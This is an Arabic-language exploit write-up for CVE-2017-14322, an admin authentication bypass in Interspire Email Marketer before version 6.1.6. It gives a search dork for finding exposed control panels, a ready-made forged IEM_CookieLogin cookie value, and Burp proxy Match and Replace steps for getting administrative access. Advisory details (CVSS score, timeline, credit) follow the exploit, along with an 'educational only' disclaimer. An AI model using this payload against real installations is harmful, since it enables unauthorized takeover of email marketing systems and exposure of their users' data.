
CVE-2017-14322 استغلال Interspire Email Marketer (emailmarketer)
intitle:"Control Panel" + emailmarketer
أضف قاعدة "Match and Replace" لرأس الطلب (Request header) كما يلي:
Match: ^Cookie.*$
Replace: Cookie: IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo4OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D
عند فتح الموقع، لن يعمل في المرة الأولى لأن رأس Cookie غير موجود. قم بتحديث الموقع للمرة الثانية باستخدام وكيل Burp مع القاعدة المذكورة أعلاه، وسترى ما تريده. تأكد من تفعيل "Intercept Client Requests".
Interspire Email Marketer - تجاوز مصادقة المسؤول عن بُعد
Hakan Küsne, Infoteam Security (CH)
CVE-2017-14322
درجة القاعدة الأساسية CVSS: 9.8 متجه CVSS: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O
2017-09-12 اكتشاف الثغرة 2017-09-12 اكتشف أن البائع قد أصلحها بالفعل لكنه لم يخطر العملاء مطلقًا، مما ترك المئات عرضة للخطر 2017-10-17 الإفصاح العام
Interspire Email Marketer قبل الإصدار 6.1.6
http://www.interspire.com/emailmarketer/
الدالة المسؤولة عن التحقق مما إذا كان المستخدم قد سجل الدخول بالفعل في init.php ضمن Interspire Email Marketer (IEM) قبل الإصدار 6.1.6 تسمح للمهاجمين عن بُعد بتجاوز المصادقة والحصول على وصول إداري باستخدام ملف تعريف الارتباط IEM_CookieLogin بقيمة مصممة خصيصًا. علاوة على ذلك، إذا لم يكن لدى العميل خطة صيانة سنوية، يقول التطبيق إنه على الإصدار الأخير المتاح ولا يوجد تحديث.
تم العثور على الثغرات أثناء الاستجابة لحادث على نسخة مخترقة من التطبيق.
التفاصيل مقدمة هنا: https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html
قام البائع بتصحيح الثغرة في الإصدار 6.1.6، لكنه لم يخطر عملاءه بذلك تحديدًا أبدًا.
هذا الإكسبلويت لأغراض تعليمية فقط وليس مسؤولاً عن أفعالك.